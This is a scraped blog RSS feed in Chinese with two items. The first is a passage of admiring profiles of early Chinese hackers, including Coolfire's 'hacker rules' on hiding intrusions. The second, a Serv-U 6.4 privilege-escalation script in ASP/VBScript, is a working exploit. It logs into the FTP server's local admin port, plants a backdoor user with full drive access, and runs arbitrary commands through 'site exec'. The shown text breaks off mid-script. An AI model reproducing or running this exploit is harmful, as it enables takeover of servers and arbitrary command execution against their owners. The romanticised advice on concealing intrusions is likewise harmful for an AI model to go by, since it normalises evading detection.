<P style="TEXT-INDENT: 2em">　　江湖中，任何厉害的“武功”本身并没有害，只是要看用它来杀人，还是救人。当90%的人用“冰河”来给别人种木马时，黄鑫觉得“冰河”已失去了再升级的意义，他终止了冰河木马升级开发后，又关闭了“木马冰河”个人站点，因为这个网站正被众多狂热的<A href="http://www.3800hk.com/">黑客</A>痴迷者变成“木马黑机”的交流园地。 </P>
<P style="TEXT-INDENT: 2em">　　2000年底，黄鑫加盟<A href="http://www.3800hk.com/">网络</A>安全网站“安全焦点”，他将完成公司本职工作之外的精力都用于知名扫描器“XSCAN″的开发升级以及“安全焦点″的建设维护。 </P>
<P style="TEXT-INDENT: 2em">　　朋友和女友对黄鑫的评价是：冰河做事情比较踏实，重实际，<A href="http://www.3800hk.com/">技术</A>很好但是谦虚，这就是他的人格魅力。 </P>
<P style="TEXT-INDENT: 2em">　　黄鑫，木马的精神领袖。他应当之无愧地为中国<A href="http://www.3800hk.com/">黑客</A>软件的头把交椅。 </P>
<P style="TEXT-INDENT: 2em">第七章：大哥袁仁广—“袁哥” </P>
<P style="TEXT-INDENT: 2em">网名：袁哥(yuange) </P>
<P style="TEXT-INDENT: 2em">姓名：袁仁广 </P>
<P style="TEXT-INDENT: 2em">别名：大兔子(datuzi) </P>
<P style="TEXT-INDENT: 2em">性别：男 </P>
<P style="TEXT-INDENT: 2em">年龄：29岁 </P>
<P style="TEXT-INDENT: 2em">擅长：windows系列 </P>
<P style="TEXT-INDENT: 2em">籍贯：重庆市 </P>
<P style="TEXT-INDENT: 2em">个人网站：yuange.yeah.net </P>
<P style="TEXT-INDENT: 2em">公司/网站名：中联绿盟信息<A href="http://www.3800hk.com/">技术</A>(北京)有限公司 </P>
<P style="TEXT-INDENT: 2em">============================================================= </P>
<P style="TEXT-INDENT: 2em">　　提起袁哥我想在安全界混的人无人不晓。他在windows系统方面的造诣，在国内应该是绝对一流的。1999年在他的个人站点里面提过的windows的共享<A href="http://www.3800hk.com/">漏洞</A>，可是很多人都用过了的吧！知道袁哥的人很多，但是袁哥的经历却是鲜为人知。 </P>
<P style="TEXT-INDENT: 2em">　　袁哥原来喜欢的是数学，崇拜科学家(不知道<A href="http://www.3800hk.com/">黑客</A>算不算科学家)。因为他很喜欢数学，所以很小就开始自学数学。数学方面从小学学初中、初中学高中、高中学大学都学遍了，还“研究”了部分研究生课程。袁哥的自学能力很强，在学习方面的理解力、思维都比较流畅，学习东西能够理解别人的那种思想、别人的思维方式，这样的效率很高的。互联网安全领域，本来就没有什么教材可言，多数都是自己摸索，袁哥的自学能力完全派上了用场。在大学里面因为专业的缘故，有很多机会接触病毒。病毒的防杀，软件加密解密，袁哥每天忙的不亦乐乎，在没有互联网的年代，病毒是最令人心动的领域，和互联网的<A href="http://www.3800hk.com/">黑客</A>一样，病毒设计的理念<A href="http://www.3800hk.com/">技术</A>都是最精尖的，不同的是，没有一个病毒制造者获得过<A href="http://www.3800hk.com/">黑客</A>这样的名声，他们各个臭名昭著。袁哥精通汇编、CPU结构、操作系统等，天天研究如何跟踪调试别人程序。病毒、加密解密的一些<A href="http://www.3800hk.com/">技术</A>与<A href="http://www.3800hk.com/">网络</A>安全是相通的，而<A href="http://www.3800hk.com/">网络</A>安全更多的是人与人之间的智力的较量，<A href="http://www.3800hk.com/">黑客</A>就是一盘棋。袁哥摸到互联网，就再也不撒手了。就和打游戏一样，还是人与人对战好玩。由于大学的时候，袁哥所在的学校没有连接INTERNET网，那时他还没有真实的接触到<A href="http://www.3800hk.com/">网络</A>安全这个话题。不过他通过一些介绍<A href="http://www.3800hk.com/">黑客</A>的杂志、图书了解了一些<A href="http://www.3800hk.com/">网络</A>安全的知识，可惜的是，这个媒体主要讨论的都是<A href="http://www.3800hk.com/">黑客</A>文化，大学毕业后，袁哥的英语越来越差，看长篇的英文资料还不如汇编代码看起来舒服。看汇编代码就像看中文小说一样的人物，碰到互联网，就龙归大海。 </P>
<P style="TEXT-INDENT: 2em">　　一开始上班，袁哥也不是很如意。袁哥原来的单位的工作，只能和单片机打交道，整天面对冷冰冰的大铁块，袁哥当然不喜欢，业余时间去自己学、钻研。1998年左右，袁哥的工作单位接入互连网后袁哥就成了“彻底垮掉的一代”。那时的安全站点，差不多就是收集的一些别人的资料，堆叠在一起，大多都是一些老掉牙的消息。所以袁哥自己的主页的时候就主要是放他自己的一些<A href="http://www.3800hk.com/">技术</A>资料，介绍一些自己的思想、<A href="http://www.3800hk.com/">技术</A>。日积月累，袁哥感觉自己在单位从事的工作已经没有什么意思了，1999年底，袁哥决定换单位了。这一回进入了绿盟公司，正儿八经地做起<A href="http://www.3800hk.com/">网络</A>安全生意。也算是步入正轨。 </P>
<P style="TEXT-INDENT: 2em">　　 </P>
<P style="TEXT-INDENT: 2em">第八章：一代宗师：Coolfire </P>
<P style="TEXT-INDENT: 2em">网名：CoolFire，Fetag </P>
<P style="TEXT-INDENT: 2em">真名：林正隆 </P>
<P style="TEXT-INDENT: 2em">性别：男 </P>
<P style="TEXT-INDENT: 2em">籍贯：台湾 </P>
<P style="TEXT-INDENT: 2em">年纪：不详 </P>
<P style="TEXT-INDENT: 2em">个人网站：fetag.dhs.org </P>
<P style="TEXT-INDENT: 2em">============================================================ </P>
<P style="TEXT-INDENT: 2em">　　台湾省是中国计算机发展早期，<A href="http://www.3800hk.com/">技术</A>最领先的地方。Coolfire就是在这里成长起来。Coolfire最常用的名字是Fetag，我一直不明白这个名字到底是什么意思。但是这并不妨碍他成为中国<A href="http://www.3800hk.com/">黑客</A>世界的大师级人物。Fetag这个名字远没有Coolfire出名，因为他用Coolfire这个名字连续写了8篇<A href="http://www.3800hk.com/">黑客</A>入门文章。许多人非常熟悉这样的开头：“这不是一个教学文件，只是告诉你该如何破解系统，好让你能够将自己的系统作安全的保护，如果你能够将这份文件完全看完，你就能够知道电脑骇客们是如何入侵你的电脑，我是CoolFire，写这篇文章的目的是要让大家明白电脑安全的重要性，并不是教人Crack Password。 </P>
<P style="TEXT-INDENT: 2em">　　这就是典型的Coolfire风格。在互联网在中国落地的早期，听说过<A href="http://www.3800hk.com/">黑客</A>的人很多，但是没有几个人真正知道<A href="http://www.3800hk.com/">黑客</A>是怎样入侵系统。Coolfire正是告诉大家什么样的人是一个恐怖的<A href="http://www.3800hk.com/">黑客</A>。我从来没有听说过Coolfire攻击过什么网站，现在的一些朋友也说Coolfire的8篇文章，根本够不上<A href="http://www.3800hk.com/">黑客</A>级别，都是小儿科的基本知识。所以我更觉得Coolfire是一个辛辛苦苦的传道士，至少他是一个优秀的作家，一个深入人心的科普作者。迄今我还没有见到任何人，能够把<A href="http://www.3800hk.com/">黑客</A>枯燥的入侵过程写得如此生动，简单。让一个上网的新手觉得<A href="http://www.3800hk.com/">黑客</A>世界离自己真的不远，自己只要伸伸手，就可以成为神秘世界的一员。 </P>
<P style="TEXT-INDENT: 2em">　　事实的确如此。今天在互联网上，名气比较大的几个<A href="http://www.3800hk.com/">黑客</A>，都不得不承认，Coolfire是他们的入门老师，他把一批最早的网虫带进了一个无穷神秘的世界。在这个世界里只有两个字：超越。 </P>
<P style="TEXT-INDENT: 2em">　　如今的互联网上，Coolfire的文章被贴得到处都是，无数刚学会设置拨号<A href="http://www.3800hk.com/">网络</A>的少年，看着Coolfire的文章依然热血沸腾。人类原始的好奇本能被这冰冷的火焰激活，他们终于发现了电脑游戏之外有一个崭新的天地，在这个天地里，法律被重新洗牌。有的人能够走出<A href="http://www.3800hk.com/">黑客</A>入侵的领域，成为大师，有的人迷失在其中，沦落囚犯。我们没有办法从道德上解读Coolfire，就像我们没有办法解读<A href="http://www.3800hk.com/">黑客</A>本质一样。Coolfire教程，犹如8颗闪亮的星，他就是存在在那里，没有解释，没有善恶。仅仅是存在。 </P>
<P style="TEXT-INDENT: 2em">　　我们今天依然仰望那里，心中充满敬仰。虚拟的世界没有办法用传统的思维来套用，如果用简单的开锁来衡量<A href="http://www.3800hk.com/">黑客</A>的发展，就太失于浅薄。Coolfire的作用没有尺度，他在一个更大的尺度上，俯瞰<A href="http://www.3800hk.com/">网络</A>世界的发展。 </P>
<P style="TEXT-INDENT: 2em">　　Coolfire，一代宗师。把他列到中国<A href="http://www.3800hk.com/">黑客</A>的第一名，应该没有什么争议。这是Coolfire写的<A href="http://www.3800hk.com/">黑客</A>守则，尽管完全是一个个人的观点，其中有一些可乐的地方，但是许多人还是把它当作现实的人在虚拟世界的一种游戏法则。 </P>
<P style="TEXT-INDENT: 2em">　　1.不恶意破坏任何的系统，这样作只会给你带来麻烦。恶意破坏它人的软体将导致法律责任，如果你只是使用电脑，那仅为非法使用!!注意：千万不要破坏别人的软件或资料!! </P>
<P style="TEXT-INDENT: 2em">　　2.不修改任何的系统文件，如果你是为了要进入系统而修改它，请在答到目的后将它改回原状。 </P>
<P style="TEXT-INDENT: 2em">　　3.不要轻易的将你要Hack的网站告诉你不信任的朋友。 </P>
<P style="TEXT-INDENT: 2em">　　4.不要在bbs上谈论你Hack的任何事情。 </P>
<P style="TEXT-INDENT: 2em">　　5.在Post文章的时候不要使用真名。 </P>
<P style="TEXT-INDENT: 2em">　　6.正在入侵的时候，不要随意离开你的电脑。 </P>
<P style="TEXT-INDENT: 2em">　　7.不要侵入或破坏政府机关的主机。 </P>
<P style="TEXT-INDENT: 2em">　　8.不在电话中谈论你Hack的任何事情。 </P>
<P style="TEXT-INDENT: 2em">　　9.将你的笔记放在安全的地方。10.想要成为Hacker就要真正的Hacking，读遍所有有关系统安全或系统<A href="http://www.3800hk.com/">漏洞</A>的文件(英文快点学好)!11.已侵入电脑中的<A href="http://www.3800hk.com/">帐号</A>不得清除或修改。12.不得修改系统档案，如果为了隐藏自己的侵入而作的修改则不在此限，但仍须维持原来系统的安全性，不得因得到系统的控制权而将门户大开!!13.不将你已破解的<A href="http://www.3800hk.com/">帐号</A>分享与你的朋友。 </P>
<P style="TEXT-INDENT: 2em">第九章：精神领袖“孤独剑客” </P>
<P style="TEXT-INDENT: 2em">网名：孤独剑客 </P>
<P style="TEXT-INDENT: 2em">真名：王献冰 </P>
<P style="TEXT-INDENT: 2em">毕业院校：郑州大学机电工程系 </P>
<P style="TEXT-INDENT: 2em">性别：男 </P>
<P style="TEXT-INDENT: 2em">年纪：30 </P>
<P style="TEXT-INDENT: 2em">个人站点：janker.org </P>
<P style="TEXT-INDENT: 2em">　　<A href="http://www.3800hk.com/">黑客</A>也许不需要出门，他们不需要阳光，甚至饮食结构也异于平常，他们只需要电脑，哦，对，还需要一根网线。 </P>
<P style="TEXT-INDENT: 2em">　　这是太多<A href="http://www.3800hk.com/">黑客</A>题材的电影给我们留下的印象：他们大都在黑屋里，守着一台破旧的电脑疯狂地打字，然后整个世界被他改变了。 </P>
<P style="TEXT-INDENT: 2em">　　王献冰就是这其中的一员，太多有关<A href="http://www.3800hk.com/">黑客</A>的事件中，都留有他的足印，但<A href="http://www.3800hk.com/">黑客</A>永远不会用真名出名，如同他自己。 </P>
<P style="TEXT-INDENT: 2em">　　他是一个需要生活的<A href="http://www.3800hk.com/">黑客</A>，他也需要事业，他的事业几乎始终围绕着信息安全展开——<A href="http://www.3800hk.com/">网络</A>带给我们一个奇怪的思维，比如，我们不可能理解一个出色的小偷去做警察，但我们绝不反对一位著名的<A href="http://www.3800hk.com/">黑客</A>成为信息安全企业的<A href="http://www.3800hk.com/">技术</A>总监。王献冰的主要工作是信息安全，<A href="http://www.3800hk.com/">黑客</A>也许只能算是他的副业。“我不喜欢<A href="http://www.3800hk.com/">黑客</A>的群体活动，比如2001年针对美国的红客风波，他们使用的一些<A href="http://www.3800hk.com/">技术</A>，我更早的时候曾经教过。” </P>
<P style="TEXT-INDENT: 2em">　　他没有《<A href="http://www.3800hk.com/">黑客</A>帝国》中那身很酷的皮夹克，也没有墨镜，见到记者的时候，他的头发有些凌乱，衣服也只能说是勉强包着身体——典型的单身男人，一切从简。他还有着中原人的憨厚，有什么就说什么，他的故事也许不像一个传奇，但足以让我们思考。 </P>
<P style="TEXT-INDENT: 2em">　　“如果不是朱明方，我想我可能就选择外企了。” </P>
<P style="TEXT-INDENT: 2em">　　做企业是为了挣钱，打工是为了谋生，进外企是为了获得更好的收入。而对王献冰来说，去外企的念头产生，源自他对自己失败经历的总结。 </P>
<P style="TEXT-INDENT: 2em">　　1997年，毕业于郑州大学机电工程系的王献冰被分配到了郑州棉麻研究所。虽然才出大学，但喜欢计算机的他很早就掌握了高明的<A href="http://www.3800hk.com/">编程</A><A href="http://www.3800hk.com/">技术</A>。“1995～1996年吧，冬天，我整晚上机，学校机房没有暖气，冷得厉害，我就披个大衣，为调试程序一晚上要重新启动机器几百次。” </P>
<P style="TEXT-INDENT: 2em">　　他的计算机才能很快就在工作中显示出来，他也很快成了骨干。当然，毕竟是国有制单位，他的月收入少得可怜——工作一年，所有工资加起来，不够买一台当时比较落后的奔腾166电脑。 </P>
<P style="TEXT-INDENT: 2em">　　但他很快乐，并且开发出来了一些项目，这些项目为研究所带来了几十万元的收入，当然，他并没有得到什么。 </P>
<P style="TEXT-INDENT: 2em">　　互联网的诱惑让他感觉到了压力。其间，他因为给商都信息港写<A href="http://www.3800hk.com/">聊天</A>室软件，开始大量接触互联网，也是从那时起他感觉到了信息安全的魅力——<A href="http://www.3800hk.com/">聊天</A>室里天天都有捣乱者，如何让他们“闭嘴”，其实是一个学问。 </P>
<P style="TEXT-INDENT: 2em">　　此时，工资低得离谱使得王献冰闷闷不乐，他的工资甚至不够上网费。所以，1999年底，当清华大学深圳研究院设立的红军旗信息<A href="http://www.3800hk.com/">技术</A>有限公司“挖”他时，面对着相当于他以前一年工资的月薪，他选择了跳槽。 </P>
<P style="TEXT-INDENT: 2em">　　“公司在深圳，我甚至没有买飞机票的钱，于是向朋友借了钱坐飞机，到了地方再报销，把钱还给朋友。”他说。 </P>
<P style="TEXT-INDENT: 2em">　　在那里，作为<A href="http://www.3800hk.com/">技术</A>总监的他做完了西南证券飞虎证券交易网的整体安全解决方案，从这时起，他专攻<A href="http://www.3800hk.com/">网络</A>安全领域，并一发而不可收拾。 </P>
<P style="TEXT-INDENT: 2em">　　“当时企业的气氛非常好，但一年过去了，市场开拓跟不上，接到的项目少，公司发展缓慢，我选择了走人。” </P>
<P style="TEXT-INDENT: 2em">　　第二份职业仍然是<A href="http://www.3800hk.com/">网络</A>安全，冲着一批很快要上的安全项目，王献冰来到了华诚集团下属的一家广州公司，承担了包括广东省公安系统、广州移动和南方证券等项目，但没过多久，他再次因为管理问题而离开了。 </P>
<P style="TEXT-INDENT: 2em">　　因为在<A href="http://www.3800hk.com/">网络</A>上的名气越来越大，他的离职也引起了相当多的人的关注。上海创源就盯住了他，老总亲自出马请他到上海工作。于是他又到了上海，职位仍然是<A href="http://www.3800hk.com/">技术</A>总监。但他当时并不知道，创源当时要做的只是一个投机的买卖，是为了报批软件园的土地而进行的短期行为，再加上做杀毒软件前期投入大、市场运作不合理，公司没过多久就陷于瘫痪状态，无法施展才能的他只好选择了离开。 </P>
<P style="TEXT-INDENT: 2em">　　这时，网泰金安公司老总亲自跑到上海来找他，“到我哪里，<A href="http://www.3800hk.com/">技术</A>总监的位置给你留着。” </P>
<P style="TEXT-INDENT: 2em">　　于是，王献冰来到了中国IT之乡北京中关村。这家公司投资7000万元人民币，又在北京，在王献冰看来，它的运作应该正规并且合理。但他没有想到的是，作为一个<A href="http://www.3800hk.com/">技术</A>人员，他的建议通常得不到批复，“<A href="http://www.3800hk.com/">技术</A>总监”的职位形同虚设。中关村中小企业的管理弊病使得他“做人比做研发还累”。 </P>
<P style="TEXT-INDENT: 2em">　　王献冰在中国的南北奔波，来回折腾了两年，职位始终是<A href="http://www.3800hk.com/">技术</A>总监，面临的问题要么是管理不善，要么就是企业另有心思。王献冰是一个纯<A href="http://www.3800hk.com/">技术</A>人员，他想做的仅仅是实现一个梦想，做好<A href="http://www.3800hk.com/">网络</A>安全，但他的疑问是，究竟还有没有尊重人才、尊重<A href="http://www.3800hk.com/">技术</A>的国内企业？ </P>
<P style="TEXT-INDENT: 2em">　　“我对国内人办的企业真的是失望了，说一套、做一套，管理也不正规。”王献冰的心思，似乎正体现着众多中关村<A href="http://www.3800hk.com/">技术</A>人员的心声。他们也许并不在乎钱，但他们需要一个可以表演的舞台。 </P>
<P style="TEXT-INDENT: 2em">　　“我不认为我缺钱，我老家是农村的，在郑州时，每月只有几百元工资，除了吃饭干不了别的，我也能熬过来。”于是，王献冰决定寻找外企。被太多的熟人教训过，外企是如何正规、如何尊重人才，这对他也是一个不小的诱惑。他在北京找了个住处住下来，开始整理思路，回想从郑州出走以后的一系列变迁。在沉积了足足有半年多的时间后，王献冰放了个风出去，他对朋友说：“我现在要找工作了，我这回只想进外企。” </P>
<P style="TEXT-INDENT: 2em">　　名声在外，一批著名的国际安全企业KPMG、ISS、CA等闻风而动，通过各种渠道找到王献冰。经历了几次事业挫折的王献冰开始慎重起来，与企业打交道采取了谈判的态度。就在这时，朱明方找到了他。 </P>
<P style="TEXT-INDENT: 2em">　　“朱总找到了我，跟我谈话，希望我不要去外企。”王献冰说。 </P>
<P style="TEXT-INDENT: 2em">　　王献冰是一个爱国者，有着极强的民族感，互联网上多次针对国外进行的网上报复行动，也许不会和他直接有关，但所采用的工具，对国外网站、<A href="http://www.3800hk.com/">服务</A>器<A href="http://www.3800hk.com/">漏洞</A>分析，却有不少是源自他的手。能在国内企业呆下去时，王献冰不会选择进外企，进外企永远是给他人打工，于自己的民族产业，尤其是知识产权，没有任何帮助。但王献冰又害怕进国内企业，因为赌输太多次，再赌下去，连赌本也得输了。 </P>
<P style="TEXT-INDENT: 2em">　　朱明方是北京盖特佳信息安全<A href="http://www.3800hk.com/">技术</A>有限公司总裁，盖特佳注入3000万元资本进行信息安全领域的市场拓展，正需要像王献冰这样的<A href="http://www.3800hk.com/">黑客</A>界顶级高手助阵。朱明方求贤若渴，而王献冰又不敢轻易答应，虽然以前认识并且交流过，王献冰对朱明方感觉不错，觉得可信，但还是会犹豫。 </P>
<P style="TEXT-INDENT: 2em">　　“我还是来了。”现在，王献冰又一次选择了国内企业，成为盖特佳公司<A href="http://www.3800hk.com/">技术</A>总监。 </P>
<P style="TEXT-INDENT: 2em">　　王献冰在盖特佳专业从事<A href="http://www.3800hk.com/">网络</A>安全方面的工作，“我们有个产品叫‘网闸’，就是对<A href="http://www.3800hk.com/">网络</A>进行隔离用的，它可以有效地避免<A href="http://www.3800hk.com/">黑客</A>攻击内部<A href="http://www.3800hk.com/">网络</A>，是我们自主开发的！”此时的他神采飞扬。 </P>
<P style="TEXT-INDENT: 2em">　　除此之外，王献冰还做安全<A href="http://www.3800hk.com/">服务</A>工作，为大型用户进行<A href="http://www.3800hk.com/">网络</A>安全评估以及解决方案。他依然是那句话，“钱只要能保证自己发展就行，其他的要回报社会。”当然，他仍然继续着他的<A href="http://www.3800hk.com/">黑客</A>交流活动。“我的个人网站，谁要是能攻破，他已经很高明了。”王献冰笑着说，“我现在白天主要是做项目、跑客户、做管理，周末、晚上则进行针对<A href="http://www.3800hk.com/">网络</A>安全<A href="http://www.3800hk.com/">技术</A>的研究工作。”换句话说，王献冰晚上也许会穿上黑色的皮夹克，戴着一副墨镜，疯狂地守着电脑键盘敲字，然后他笑了，<A href="http://www.3800hk.com/">网络</A>因此而改变。 </P>
<P style="TEXT-INDENT: 2em">第10章：无为而为--Frankie </P>
<P style="TEXT-INDENT: 2em">公司/网站：深圳安络科技公司 </P>
<P style="TEXT-INDENT: 2em">网名：Frankie </P>
<P style="TEXT-INDENT: 2em">别名：老毒物、浪子 </P>
<P style="TEXT-INDENT: 2em">姓名：谢朝霞 </P>
<P style="TEXT-INDENT: 2em">性别：男 </P>
<P style="TEXT-INDENT: 2em">年龄：28 </P>
<P style="TEXT-INDENT: 2em">籍贯：湖南 </P>
<P style="TEXT-INDENT: 2em">擅长：Windows NT </P>
<P style="TEXT-INDENT: 2em">网站：http://cnns.net </P>
<P style="TEXT-INDENT: 2em">　　知道Frankie真名的人都会大吃一惊，大名鼎鼎的<A href="http://www.3800hk.com/">黑客</A>原来是一个女的？事实又令他们吃惊，这个名字的主人是一位堂堂正正的男子汉。Frankie的名字因为“深圳晨光”安全网站而出名。从来没有听说过Frankie入侵过什么网站，但是许多<A href="http://www.3800hk.com/">黑客</A>都非常佩服他。深圳晨光的浪子，每天花大量时间收集<A href="http://www.3800hk.com/">黑客</A>信息，深入剖析Windows NT系统。他在这个领域的研究国内罕有对手。现在深圳的一些报纸把他成为华南<A href="http://www.3800hk.com/">网络</A>安全专家。能够登录他网站“极度魔界”的许多人，都是中国顶尖的<A href="http://www.3800hk.com/">网络</A>安全高手。一个朋友说：Frankie是最好的网管，只要有他守着，就可以放心了。 </P>
<P style="TEXT-INDENT: 2em">　　第一次见到Frankie是一个朋友介绍，当时Frankie所在的公司居然是一个研究<A href="http://www.3800hk.com/">自动</A>对时手表的公司，通过电台发出的广播，钟表可以<A href="http://www.3800hk.com/">自动</A>调整自己的时间，永远保证准时。这是一个非常吸引人的项目，但是Frankie做不太合适。我一直诧异，Frankie在公司到底负责什么方面的东西。在他的桌子前摆满的Linux、SUN OS的书。今年，Frankie终于走入正途，把对系统的研究转化成为产品。深圳安络科技公司成立了，像美国最著名的<A href="http://www.3800hk.com/">网络</A>安全公司ISS的创始人一样，这些联合起来的<A href="http://www.3800hk.com/">网络</A>安全专家，组成了一支队伍，要建立中国自己的<A href="http://www.3800hk.com/">网络</A>安全系统。我之所以认为Coolfire是一个没有办法讨论的人物，就是因为有Frankie这样的人出现。回归“魔侠”问题，出路都是自己走的，起初并没有大的区别，但是一步一步走下来，有人把他变成了一种事业，有人误入歧途。 </P>
<P style="TEXT-INDENT: 2em">　　Frankie是一个比较奇怪的人，他很少用email不知道是什么时候养成的习惯。他自己有一个“浪子IRC”(一种<A href="http://www.3800hk.com/">网络</A><A href="http://www.3800hk.com/">聊天</A>的工具)，他曾经告诉我，多数时候，他都在浪子IRC里。我每次登录进去都用“Find_Frankie”的名字，一进去就大喊，Frankie、Fiankie，随后就有许多老熟客般的人物出现，有时会告诉我他在哪里，多数时候是“今天没来！”“好的<A href="http://www.3800hk.com/">黑客</A>都不用ICQ”Frankie曾经对我说过，但是真是不知道，他怎么能在<A href="http://www.3800hk.com/">网络</A>世界自由的联系这么朋友。Frankie是进入互联网<A href="http://www.3800hk.com/">黑客</A>世界比较早的人，找到了一些非常好的朋友，抓住了机遇。但是成功的路毕竟还是很长，从一个<A href="http://www.3800hk.com/">技术</A>精尖的人，变化成为一个全面产品开发者，有许多路要走。 </P>
<P style="TEXT-INDENT: 2em">第11章：<A href="http://www.3800hk.com/">黑客</A>大姐大“Wollf” </P>
<P style="TEXT-INDENT: 2em">网名：Wollf </P>
<P style="TEXT-INDENT: 2em">真名：王娟 </P>
<P style="TEXT-INDENT: 2em">籍贯：四川 </P>
<P style="TEXT-INDENT: 2em">性别：女 </P>
<P style="TEXT-INDENT: 2em">年纪：不详 </P>
<P style="TEXT-INDENT: 2em">============================================================ </P>
<P style="TEXT-INDENT: 2em">　　王娟是四川人。当初在海南一家<A href="http://www.3800hk.com/">网络</A>公司工作时，在某次论坛上认识了一些圈内人，学计算机的王娟对<A href="http://www.3800hk.com/">网络</A>安全产生了极大的兴趣。 </P>
<P style="TEXT-INDENT: 2em">　　其实主要还是这帮人吸引了她。对王娟来说，<A href="http://www.3800hk.com/">黑客</A>在人格魅力上的吸引似乎比<A href="http://www.3800hk.com/">技术</A>更大。接触了这个圈子，交了些朋友，就很需要得到圈子内的肯定，在和quack等一些朋友的交流中，王娟写出了wollf木马，奠下了她的“地位”。<A href="http://www.3800hk.com/">网络</A>安全圈女性本来就少，像王娟这样知名的更是凤毛麟角。 </P>
<P style="TEXT-INDENT: 2em">　　2000年底，在海南的一个信息安全论坛上，已经是“标准女<A href="http://www.3800hk.com/">黑客</A>”的王娟认识了“冰河”黄鑫，两个志同道合的人切磋之后，情投意合，开始并肩闯江湖。 </P>
<P style="TEXT-INDENT: 2em">　　其实，王娟很讨厌外行称自己是<A href="http://www.3800hk.com/">黑客</A>，很多人眼中的<A href="http://www.3800hk.com/">黑客</A>只是“乱黑人家机器的小孩子”，被她称为“小黑黑”。“这种小黑黑的行为，我真不敢认同”，黑别人机器这种事，对她简直就如喝白开水一样简单，但是她根本不屑于这样做。 </P>
<P style="TEXT-INDENT: 2em">　　王娟谈到“小黑黑”时的口气，给人的感觉就像第三次华山论剑后，杨过他们在山下发现一帮“论剑客”时的心情一样</P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/4191824020083202296453</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/4191824020083202296453</guid>
    <pubDate>Sun, 20 Apr 2008 14:29:06 +0800</pubDate>
    <dcterms:modified>2008-04-22T10:54:18+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[Serv-U 6.4 提权脚本.asp]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/4191824020083374716391</link>
    <description><![CDATA[<div><P>&lt;%@ LANGUAGE = VBScript %&gt;<BR>&lt;%<BR>Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit<BR>dim action<BR>action=request("action")<BR>if not isnumeric(action) then response.end<BR>user = trim(request("u"))<BR>pass = trim(request("p"))<BR>port = trim(request("port"))<BR>cmd = trim(request("c"))<BR>f=trim(request("f"))<BR>if f="" then<BR>f=gpath()<BR>else<BR>f=left(f,2)<BR>end if<BR>ftpport = ffport<BR>timeout=3</P>
<P>loginuser = "User " &amp; user &amp; vbCrLf<BR>loginpass = "Pass " &amp; pass &amp; vbCrLf<BR>deldomain = "-DELETEDOMAIN" &amp; vbCrLf &amp; "-IP=" &amp; iip &amp; vbCrLf &amp; " PortNo=" &amp; ftpport &amp; vbCrLf<BR>mt = "SITE MAINTENANCE" &amp; vbCrLf<BR>newdomain = "-SETDOMAIN" &amp; vbCrLf &amp; "-Domain=leaves|" &amp; iip &amp; "|" &amp; ftpport &amp; "|-1|1|0" &amp; vbCrLf &amp; "-TZOEnable=0" &amp; vbCrLf &amp; " TZOKey=" &amp; vbCrLf<BR>newuser = "-SETUSERSETUP" &amp; vbCrLf &amp; "-IP=0.0.0.0" &amp; vbCrLf &amp; "-PortNo=" &amp; ftpport &amp; vbCrLf &amp; "-User=luo" &amp; vbCrLf &amp; "-Password=ye" &amp; vbCrLf &amp; _<BR>"-HomeDir=c:\\" &amp; vbCrLf &amp; "-LoginMesFile=" &amp; vbCrLf &amp; "-Disable=0" &amp; vbCrLf &amp; "-RelPaths=1" &amp; vbCrLf &amp; _<BR>"-NeedSecure=0" &amp; vbCrLf &amp; "-HideHidden=0" &amp; vbCrLf &amp; "-AlwaysAllowLogin=0" &amp; vbCrLf &amp; "-ChangePassword=0" &amp; vbCrLf &amp; _<BR>"-QuotaEnable=0" &amp; vbCrLf &amp; "-MaxUsersLoginPerIP=-1" &amp; vbCrLf &amp; "-SpeedLimitUp=0" &amp; vbCrLf &amp; "-SpeedLimitDown=0" &amp; vbCrLf &amp; _<BR>"-MaxNrUsers=-1" &amp; vbCrLf &amp; "-IdleTimeOut=600" &amp; vbCrLf &amp; "-SessionTimeOut=-1" &amp; vbCrLf &amp; "-Expire=0" &amp; vbCrLf &amp; "-RatioUp=1" &amp; vbCrLf &amp; _<BR>"-RatioDown=1" &amp; vbCrLf &amp; "-RatiosCredit=0" &amp; vbCrLf &amp; "-QuotaCurrent=0" &amp; vbCrLf &amp; "-QuotaMaximum=0" &amp; vbCrLf &amp; _<BR>"-Maintenance=System" &amp; vbCrLf &amp; "-PasswordType=Regular" &amp; vbCrLf &amp; "-Ratios=None" &amp; vbCrLf &amp; " Access=c:\\|RWAMELCDP" &amp; vbCrLf<BR>quit = "QUIT" &amp; vbCrLf<BR>newuser=replace(newuser,"c:",f)<BR>select case action<BR>case 1<BR>set a=Server.CreateObject("Microsoft.XMLHTTP")<BR>a.open "GET", "<A href="http://127.0.0.1">http://127.0.0.1</A>:" &amp; port &amp; "/leaves/upadmin/s1",True, "", ""<BR>a.send loginuser &amp; loginpass &amp; mt &amp; deldomain &amp; newdomain &amp; newuser &amp; quit<BR>set session("a")=a<BR>%&gt;<BR>&lt;form method="post" name="leaves"&gt;<BR>&lt;input name="u" type="hidden" id="u" value="&lt;%=user%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="p" type="hidden" id="p" value="&lt;%=pass%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="port" type="hidden" id="port" value="&lt;%=port%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="c" type="hidden" id="c" value="&lt;%=cmd%&gt;" size="50"&gt;<BR>&lt;input name="f" type="hidden" id="f" value="&lt;%=f%&gt;" size="50"&gt;<BR>&lt;input name="action" type="hidden" id="action" value="2"&gt;&lt;/form&gt;<BR>&lt;script language="javascript"&gt;<BR>document.write('&lt;center&gt;正在连接 127.0.0.1:&lt;%=port%&gt;,使用用户名: &lt;%=user%&gt;,口令：&lt;%=pass%&gt;...&lt;center&gt;');<BR>setTimeout("document.all.leaves.submit();",4000);<BR>&lt;/script&gt;<BR>&lt;%<BR>case 2<BR>set b=Server.CreateObject("Microsoft.XMLHTTP")<BR>b.open "GET", "<A href="http://127.0.0.1">http://127.0.0.1</A>:" &amp; ftpport &amp; "/leaves/upadmin/s2", True, "", ""<BR>b.send "User luo" &amp; vbCrLf &amp; "pass ye" &amp; vbCrLf &amp; "site exec " &amp; cmd &amp; vbCrLf &amp; quit<BR>set session("b")=b<BR>%&gt;<BR>&lt;form method="post" name="leaves"&gt;<BR>&lt;input name="u" type="hidden" 